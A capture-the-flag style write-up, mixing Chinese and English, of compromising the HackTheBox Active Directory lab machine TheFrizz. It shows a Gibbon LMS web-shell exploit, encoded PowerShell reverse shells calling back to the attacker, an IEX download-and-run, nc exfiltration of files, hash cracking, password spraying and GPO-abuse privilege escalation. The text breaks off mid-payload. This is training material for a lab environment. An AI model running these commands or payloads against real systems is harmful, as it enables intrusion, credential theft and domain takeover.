HackTheBox: TheFrizz [Active Directory]
HackTheBox: TheFrizz [Active Directory]
Table of Contents
[TOC]
Topic
Lab
- HackTheBox:
https://app.hackthebox.com/machines/TheFrizz
Initial Enumeration
● Start Machine: 10.10.11.60
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -Pn 10.10.11.60
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 08:11 EDT
Nmap scan report for 10.10.11.60
Host is up (0.24s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-08 19:12:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-08T19:12:29
|_ start_date: N/A
|_clock-skew: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.24 seconds
DNS, SSH, SMB, ldap, HTTP, kpasswd5, Kerberos
Doman:frizz.htbHTTP:frizzdc.frizz.htbSMB: smb2-security-mode
Message signing enabled and required
要求 SMB 簽章 👉🏻 不能使用 Relaying Net-NTLM
編輯 /etc/hosts
┌──(chw㉿CHW)-[~]
└─$ cat /etc/hosts
10.10.11.60 frizzdc.frizz.htb frizz.htb
...
瀏覽 http://frizzdc.frizz.htb/home/
下面有一串詭異的字串:
V2FudCB0byBsZWFybiBoYWNraW5n IGJ1dCBkb24ndCB3YW50IHRvIGdv IHRvIGphaWw/IFlvdSdsbCBsZWFy biB0aGUgaW4ncyBhbmQgb3V0cyBv ZiBTeXNjYWxscyBhbmQgWFNTIGZy b20gdGhlIHNhZmV0eSBvZiBpbnRl cm5hdGlvbmFsIHdhdGVycyBhbmQg aXJvbiBjbGFkIGNvbnRyYWN0cyBm cm9tIHlvdXIgY3VzdG9tZXJzLCBy ZXZpZXdlZCBieSBXYWxrZXJ2aWxs ZSdzIGZpbmVzdCBhdHRvcm5leXMu
(Base64 Decode)
Want to learn hacking but don't want to go to jail? You'll learn the in's and outs of Syscalls and XSS from the safety of international waters and iron clad contracts from your customers, reviewed by Walkerville's finest attorneys.
(繁體中文友善)
想學習駭客技術但又不想坐牢?你將在國際水域的安全環境中,透過堅不可摧的合約學會 Syscalls 與 XSS,這些合約皆由 Walkerville 最優秀的律師審核。🤔
view-source 沒有明顯漏洞
Gibbon v25.0.00
Solution
1. Search Exploit
- 搜尋 exploit-db:
Gibbon
若找到 credential,可嘗試利用 Authenticated RCE
- 搜尋 Google:
CVE-2023-45878
尋找可用的 Exploit
- ffuf path
┌──(chw㉿CHW)-[~]
└─$ ffuf -t 50 -r -w /usr/share/dirb/wordlists/common.txt -u http://frizzdc.frizz.htb/FUZZ -e .git,.php,.bak,.zip
沒有可利用的資訊
2. CVE-2023-45878 Explot
利用 CVE-2023-45878 Explot 建立 Reverse shell
┌──(chw㉿CHW)-[~/Tools/CVE-exploit/CVE-2023-4587_Gibbon_v25_File_Write]
└─$ python3 CVE-2023-45878.py -t frizzdc.frizz.htb -s -i {Kali IP} -p 8888
[+] Uploading web shell as xjfsjhmk.php...
[+] Upload successful.
[+] Sending PowerShell reverse shell payload to http://frizzdc.frizz.htb/Gibbon-LMS/xjfsjhmk.php
[*] Make sure your listener is running: nc -lvnp 8888
[+] Executing command on: http://frizzdc.frizz.htb/Gibbon-LMS/xjfsjhmk.php?cmd=powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand CgAgACAAIAAgACQAYwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAiADEAMAAuADEAMAAuADEANAAuADEANwA5ACIALAA4ADgAOAA4ACkAOwAKACAAIAAgACAAJABzAHQAcgBlAGEAbQAg...BQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAJwA+ACAAJwA7AAoAIAAgACAAIAAgACAAIAAgACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsACgAgACAAIAAgACAAIAAgACAAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7AAoAIAAgACAAIAAgACAAIAAgACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApADsACgAgACAAIAAgAH0ACgAgACAAIAAgACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAAoAIAAgACAAIAA=
[!] Error connecting to web shell: HTTPConnectionPool(host='frizzdc.frizz.htb', port=80): Read timed out. (read timeout=5)
開啟監聽 port
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
成功接收 Reverse shell (Medium level ?!!)
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [10.10.14.179] from (UNKNOWN) [10.10.11.60] 49891
PS C:\xampp\htdocs\Gibbon-LMS> whoami
frizz\w.webservice
PS C:\xampp\htdocs\Gibbon-LMS> net user /domain
User accounts for \\FRIZZDC
-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice
The command completed successfully.
PS C:\xampp\htdocs\Gibbon-LMS> net user w.webservice
User name w.Webservice
Full Name webservice Webservice
Comment Service for the website
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/29/2024 7:27:04 AM
Password expires Never
Password changeable 10/29/2024 7:27:04 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/8/2025 10:03:24 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
查詢 User 是為了要嘗試 AS-REP Roasting
3. AS-REP Roasting
找出無需 Kerberos preauthentication 的帳戶:
┌──(chw㉿CHW)-[~]
└─$ cat TheFrizz_name.txt
a.perlstein
Administrator
c.ramon
c.sandiego
d.hudson
f.frizzle
g.frizzle
Guest
h.arm
J.perlstein
k.franklin
krbtgt
l.awesome
m.ramon
M.SchoolBus
p.terese
r.tennelli
t.wright
v.frizzle
w.li
w.Webservice
┌──(chw㉿CHW)-[~]
└─$ impacket-GetNPUsers frizz.htb/ -dc-ip 10.10.11.60 -no-pass -usersfile TheFrizz_name.txt
Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User a.perlstein doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User c.ramon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User c.sandiego doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.hudson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User f.frizzle doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User g.frizzle doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User h.arm doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.perlstein doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.franklin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User l.awesome doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.ramon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User M.SchoolBus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User p.terese doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.tennelli doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User t.wright doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User v.frizzle doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User w.li doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User w.Webservice doesn't have UF_DONT_REQUIRE_PREAUTH set
沒有找到無需 Kerberos preauthentication 的 User
🧠:
提權取得 w.Webservice,進行 Kerberoasting嘗試幾個方法都失敗
沒注意可讀
C:\xampp下的資料
4. C:\xampp
看到其他 Player 上傳的 Shell 🐚
-
C:\xampp\mysql\backup\my.ini
-
C:\xampp\mysql\README.md
MariaDB
-
C:\xampp\mysql\data\mysql\global_priv.*
-
C:\xampp\mysql\data\global_priv.MAD
Host: localhost
User: root
Hash: *87323B8D2F18F7090F3655A9B69B4AE2A074AB0C
Host: localhost
User: MrGibbonsDB
Hash: *65A8BE9B3524B64167F92587F87F4B3D50EB2383
5. Hashcat
┌──(chw㉿CHW)-[~]
└─$ cat TheFrizz_sql.hash
87323B8D2F18F7090F3655A9B69B4AE2A074AB0C
65A8BE9B3524B64167F92587F87F4B3D50EB2383
┌──(chw㉿CHW)-[~]
└─$ hashcat -m 300 -a 0 TheFrizz_sql.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
...
天荒地老
回去繼續看 XAMPP 設定檔
C:\xampp\htdocs\Gibbon-LMS\config.php
😐😐😐
MrGibbonsDB:MisterGibbs!Parrot!?1
雖然 Server 沒有 3389 port 系統中存在
C:\xampp\mysql\bin\mysql.exe
6. Mysql
PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "show databases;"
Database
gibbon
information_schema
test
PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -D gibbon -e "show tables;"
Tables_in_gibbon
gibbonaction
gibbonactivity
gibbonactivityattendance
gibbonactivityslot
gibbonactivitystaff
gibbonactivitystudent
gibbonactivitytype
gibbonadmissionsaccount
gibbonadmissionsapplication
gibbonalarm
gibbonalarmconfirm
...
gibbonperson
gibbonpersonaldocument
gibbonpersonaldocumenttype
gibbonpersonmedical
gibbonpersonmedicalcondition
gibbonpersonmedicalconditionupdate
gibbonpersonmedicalupdate
gibbonpersonreset
gibbonpersonstatuslog
...
gibbonperson: 可能會是使用者資訊
PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -D gibbon -e "SELECT * FROM gibbonperson;"
gibbonPersonID title surname firstName preferredName officialName nameInCharacters gender username passwordStrong passwordStrongSalt passwordForceReset status canLogin gibbonRoleIDPrimary gibbonRoleIDAll dob email emailAlternate image_240 lastIPAddress lastTimestamp lastFailIPAddress lastFailTimestamp failCount address1 address1District address1Country address2 address2District address2Country phone1Type phone1CountryCode phone1 phone3Type phone3CountryCode phone3 phone2Type phone2CountryCode phone2 phone4Type phone4CountryCode phone4 website languageFirst languageSecond languageThird countryOfBirth birthCertificateScan ethnicity religion profession employer jobTitle emergency1Name emergency1Number1 emergency1Number2 emergency1Relationship emergency2Name emergency2Number1 emergency2Number2 emergency2Relationship gibbonHouseID studentID dateStart dateEnd gibbonSchoolYearIDClassOf lastSchool nextSchool departureReason transport transportNotes calendarFeedPersonal viewCalendarSchool viewCalendarPersonal viewCalendarSpaceBooking gibbonApplicationFormID lockerNumber vehicleRegistration personalBackground messengerLastRead privacy dayType gibbonThemeIDPersonal gibboni18nIDPersonal studentAgreements googleAPIRefreshToken microsoftAPIRefreshToken genericAPIRefreshToken receiveNotificationEmails mfaSecret mfaToken cookieConsent fields
0000000001 Ms. Frizzle Fiona Fiona Fiona Frizzle Unspecified f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489 N Full Y 001 001 NULL f.frizzle@frizz.htb NULL NULL ::1 2024-10-29 09:28:59 NULL NULL 0 NULL NULL NULL NULL Y Y N NULL NULL NULL NULL NULL NULL NULL Y NULL NULL NULL
f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03Salt:/aACFhikmNopqrRTVz2489
7. Hashcat again
┌──(chw㉿CHW)-[~]
└─$ cat TheFrizz_gibbon.hash
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
┌──(chw㉿CHW)-[~]
└─$ hashcat -m 1420 -a 0 TheFrizz_gibbon.hash /usr/share/wordlists/rockyou.txt --force -O
hashcat (v6.2.6) starting
...
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni******Magic23
f.frizzle:Jenni******Magic23
- 嘗試登入 Gibbon http://frizzdc.frizz.htb/Gibbon-LMS/
沒有可用資訊
- 嘗試登入 SSH
┌──(chw㉿CHW)-[~]
└─$ ssh f.frizzle@10.10.11.60
f.frizzle@10.10.11.60: Permission denied (gssapi-with-mic,keyboard-interactive).
┌──(chw㉿CHW)-[~]
└─$ sshpass -p 'Jenni******Magic23' ssh -o PreferredAuthentications=password f.frizzle@10.10.11.60
f.frizzle@10.10.11.60: Permission denied (gssapi-with-mic,keyboard-interactive).
沒有權限登入 ?!
8. Kerberoasting
┌──(chw㉿CHW)-[~]
└─$ sudo ntpdate -u 10.10.11.60
2025-05-18 13:29:13.245591 (-0400) +25201.312121 +/- 0.169647 10.10.11.60 s1 no-leap
CLOCK: time stepped by 25201.312121
┌──(chw㉿CHW)-[~]
└─$ impacket-getTGT frizz.htb/'f.frizzle':'Jenni******Magic23' -dc-ip 10.10.11.60
Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
與目標機器 時間偏差過大
ntpdate -u解決不了,系統會自動更新
sudo sutimedatectl set-ntp off: 關閉 Network Time Protocol auto-updatingrdate -n [Target IP]
┌──(chw㉿CHW)-[~]
└─$ sudo su
┌──(root㉿CHW)-[/home/chw]
└─# timedatectl set-ntp off
┌──(root㉿CHW)-[/home/chw]
└─# sudo ntpdate -u 10.10.11.60
2025-06-08 05:18:09.854773 (-0400) +484.270476 +/- 0.091010 10.10.11.60 s1 no-leap
CLOCK: time stepped by 484.270476
┌──(root㉿CHW)-[/home/chw]
└─# impacket-getTGT frizz.htb/f.frizzle:Jenni******Magic23 -dc-ip 10.10.11.60
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
┌──(root㉿CHW)-[/home/chw]
└─# export KRB5CCNAME=f.frizzle.ccache
impacket-GetUserSPNs -request -dc-ip 10.10.11.60 -dc-host frizzdc.frizz.htb -k -no-pass frizz.htb/f.frizzle
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
No entries found!
f.frizzle沒有 Kerberoastable 的 SPN Service
9. SSH
┌──(root㉿CHW)-[/home/chw]
└─# impacket-getTGT frizz.htb/f.frizzle:Jenni******Magic23 -dc-ip 10.10.11.60
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
┌──(root㉿CHW)-[/home/chw]
└─# KRB5CCNAME=f.frizzle.ccache ssh -K -oGSSAPIAuthentication=yes -oGSSAPIDelegateCredentials=yes f.frizzle@frizz.htb
f.frizzle@frizz.htb: Permission denied (gssapi-with-mic,keyboard-interactive).
┌──(chw㉿CHW)-[~]
└─$ KRB5CCNAME=f.frizzle.ccache ssh -vv -K -oGSSAPIAuthentication=yes -oGSSAPIDelegateCredentials=yes f.frizzle@frizzdc.frizz.htb
...
Cannot find KDC for realm "FRIZZ.HTB"
...
f.frizzle@frizzdc.frizz.htb: Permission denied (gssapi-with-mic,keyboard-interactive).
參考了厲害的網站
設定 /etc/krb5.conf,手動加入 realm 和 KDC 位置
┌──(chw㉿CHW)-[~]
└─$ cat /etc/krb5.conf
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
[realms]
FRIZZ.HTB = {
kdc = 10.10.11.60
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
再次嘗試登入 SSH
┌──(chw㉿CHW)-[~]
└─$ KRB5CCNAME=/home/chw/f.frizzle.ccache ssh -vv -K -oGSSAPIAuthentication=yes -oGSSAPIDelegateCredentials=yes f.frizzle@frizzdc.frizz.htb
...
PS C:\Users\f.frizzle\Desktop> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle>
✅ Get User Flag
在
C:\Users\f.frizzle\Desktop找到 User flag
Privileges Escalation
10. BloodHoud
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
SharpHound 掃描
PS C:\Users\f.frizzle\Desktop> IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.71/SharpHound.ps1')
PS C:\Users\f.frizzle\Desktop> Get-Command Invoke-BloodHound
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-BloodHound
PS C:\Users\f.frizzle\Desktop> Invoke-BloodHound -CollectionMethod All -OutputDirectory "C:\Users\f.frizzle\Desktop\"
...
掃描後傳回 Kali
PS C:\Users\f.frizzle\Desktop> (New-Object Net.WebClient).DownloadFile("http://10.10.14.71/nc.exe", "C:\Users\f.frizzle\Desktop\nc.exe")
PS C:\Users\f.frizzle\Desktop> type .\20250518152732_BloodHound.zip | .\nc.exe 10.10.14.71 55688
( Kali )
┌──(chw㉿CHW)-[~]
└─$ nc -lvnp 55688 > TheFrizz.zip
listening on [any] 55688 ...
connect to [10.10.14.71] from (UNKNOWN) [10.10.11.60] 62675
TheFrizz.zip
BloodHound 分析
Domain admin:
V.FRIZZLE&ADMINISTRATOR
- 標記 User as Owned
f.frizzle&w.webservice
- 查看
f.frizzle權限 (INBOUND CONTROL RIGHTS)
(OUTBOUND OBJECT CONTROL)
不是 Domain Admin Member 😐
f.frizzle有 Remote Management Users 權限
- 查看
f.frizzle"Shortest Paths to Domain Admins from Owned Principals"
f.frizzle沒有高權限 GenericAll / WriteDACL / AddMember
只能 CanPSRemote 遠端登入 FRIZZDC
沒招了🫠 參考別人 Writeup
👉🏻 Recycle ♻️ 🗑️ 🚮
11. 回收桶 ♻️ 🗑️ 🚮
建立 COM 物件 Shell.Application (操作 Windows 檔案總管介面的物件)
Namespace(0xA)代表 回收桶(Recycle Bin)Namespace(0x10)代表 使用者的桌面資料夾
$shell = New-Object -ComObject Shell.Application
$recycleBin = $shell.Namespace(0xA)
$recycleBin.Items() | Select-Object Name, Path
Name Path
---- ----
wapt-backup-sunday.7z C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z
$item = $recycleBin.Items() | Where-Object {$_.Name -eq "wapt-backup-sunday.7z"}
$desktop = (New-Object -ComObject Shell.Application).Namespace(0x10)
$desktop.MoveHere($item)
PS C:\Users\f.frizzle> ls .\Desktop\
Directory: C:\Users\f.frizzle\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 6/6/2025 8:19 PM 34 user.txt
-a--- 10/24/2024 9:16 PM 30416987 wapt-backup-sunday.7z
找到 wapt-backup-sunday.7z 壓縮檔,移至使用者桌面
11.1 回傳至 Kali
(Kali)
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ python3 -m http.server 80
(Windows)
PS C:\Users\f.frizzle> (New-Object Net.WebClient).DownloadFile('http://10.10.14.207/nc.exe', 'C:\Users\f.frizzle\Desktop\nc.exe')
PS C:\Users\f.frizzle> ls .\Desktop\
Directory: C:\Users\f.frizzle\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 6/8/2025 3:07 AM 38616 nc.exe
-ar-- 6/6/2025 8:19 PM 34 user.txt
-a--- 10/24/2024 9:16 PM 30416987 wapt-backup-sunday.7z
使用 nc 回傳到 Kali:
(Kali)
┌──(chw㉿CHW)-[~]
└─$ nc -lvnp 55688 > wapt-backup-sunday.7z
listening on [any] 55688 ...
(Windows)
$client = New-Object System.Net.Sockets.TcpClient("10.10.14.207", 55688)
$stream = $client.GetStream()
$data = [System.IO.File]::ReadAllBytes("C:\Users\f.frizzle\Desktop\wapt-backup-sunday.7z")
$stream.Write($data, 0, $data.Length)
$stream.Close()
$client.Close()
11.2 分析 wapt-backup-sunday.7z
┌──(chw㉿CHW)-[~]
└─$ 7z x wapt-backup-sunday.7z
在
conf/waptserver.ini中找到 wapt_password (Base64 decode):!suBcig@******!R
接著尋找 PWD 對應的 User
12. Kerbrute passwordspray
尋找 user,透過 net user /domain 建立 TheFrizz_user.txt
PS C:\Users\f.frizzle\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice
The command completed with one or more errors.
PS C:\Users\f.frizzle\Desktop>
進行 passwordspray
┌──(chw㉿CHW)-[~]
└─$ cat TheFrizz_user.txt
a.perlstein
Administrator
c.ramon
c.sandiego
d.hudson
f.frizzle
g.frizzle
...
┌──(chw㉿CHW)-[~]
└─$ kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 \TheFrizz_user.txt '!suBcig@******!R'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 06/08/25 - Ronnie Flathers @ropnop
2025/06/08 17:30:57 > Using KDC(s):
2025/06/08 17:30:57 > 10.10.11.60:88
2025/06/08 17:31:01 > [+] VALID LOGIN: M.SchoolBus@frizz.htb:!suBcig@******!R
2025/06/08 17:31:01 > Done! Tested 21 logins (1 successes) in 3.739 seconds
M.SchoolBus@frizz.htb:!suBcig@******!R
12.1 確認 M.SchoolBus 可執行
┌──(chw㉿CHW)-[~]
└─$ impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@******!R' -dc-ip 10.10.11.60
Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in M.SchoolBus.ccache
┌──(chw㉿CHW)-[~]
└─$ KRB5CCNAME=/home/chw/M.SchoolBus.ccache ssh -K -oGSSAPIAuthentication=yes -oGSSAPIDelegateCredentials=yes M.SchoolBus@frizzdc.frizz.htb
PowerShell 7.4.5
PS C:\Users\M.SchoolBus>
PS C:\Users\M.SchoolBus>
13. Bloodhound
回到 BloodHound
-
標記
M.SchoolBusas Owned
-
查看
M.SchoolBus權限 (INBOUND CONTROL RIGHTS)
(OUTBOUND OBJECT CONTROL)
-
查看
f.frizzle"Shortest Paths to Domain Admins from Owned Principals"
14. Group Policy Object (GPO) Abuse
14.1 確認 Group 權限
PS C:\Users\M.SchoolBus\Desktop> ls
Directory: C:\Users\M.SchoolBus\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 6/8/2025 3:52 PM 80896 SharpGPOAbuse.exe
PS C:\Users\M.SchoolBus\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
...
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
frizz\Desktop Admins Group S-1-5-21-2386970044-1145388522-2932701813-1121 Mandatory group, Enabled by default, Enabled group
frizz\Group Policy Creator Owners Group S-1-5-21-2386970044-1145388522-2932701813-520 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
frizz\Denied RODC Password Replication Group Alias S-1-5-21-2386970044-1145388522-2932701813-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
frizz\Group Policy Creator Owners: frizz 內建群組的成員,可嘗試創建惡意 GPO
14.2 創建 New-GPO
New-GPO -Name <name>:
在 AD 建一個 GPC:CN={GUID},CN=Policies,CN=System,<domainDN>(物件 DN 以 GUID 命名)
在 SYSVOL 建對應 GPT:\\<domain>\SYSVOL\<domain>\Policies\{GUID}\。 建立者將會成為 Owner(且對該 GPO 有 Full Control)。
PS C:\Users\M.SchoolBus\Desktop> New-GPO -Name chw | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
GpoId : 0329b9b2-02c7-4796-a039-fb5123d758fb
DisplayName : chw
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 3
"OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB": 把這個 GPO 連到「Domain Controllers」OU
14.3 利用 SharpGPOAbuse.exe
( Kali 傳入 SharpGPOAbuse.exe )
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ sudo ntpdate -u 10.10.11.60
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@******!R' -dc-ip 10.10.11.60
...
[*] Saving ticket in M.SchoolBus.ccache
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ export KRB5CCNAME=M.SchoolBus.ccache
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ KRB5CCNAME=M.SchoolBus.ccache \
scp -P 22 -o GSSAPIAuthentication=yes -o PreferredAuthentications=gssapi-with-mic \
./SharpGPOAbuse.exe m.schoolbus@frizz.htb:"C:/Users/m.schoolbus/Desktop/"
SharpGPOAbuse.exe 100% 79KB 70.3KB/s 00:01
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ nc -lvnp 8888
listening on [any] 8888 ...
(Windows: M.SchoolBus)
PS C:\Users\M.SchoolBus\Desktop> .\SharpGPOAbuse.exe --addcomputertask --gponame "chw" --author TCG --taskname PrivEsc --command "powershell.exe" --arguments "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgA3ACIALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADs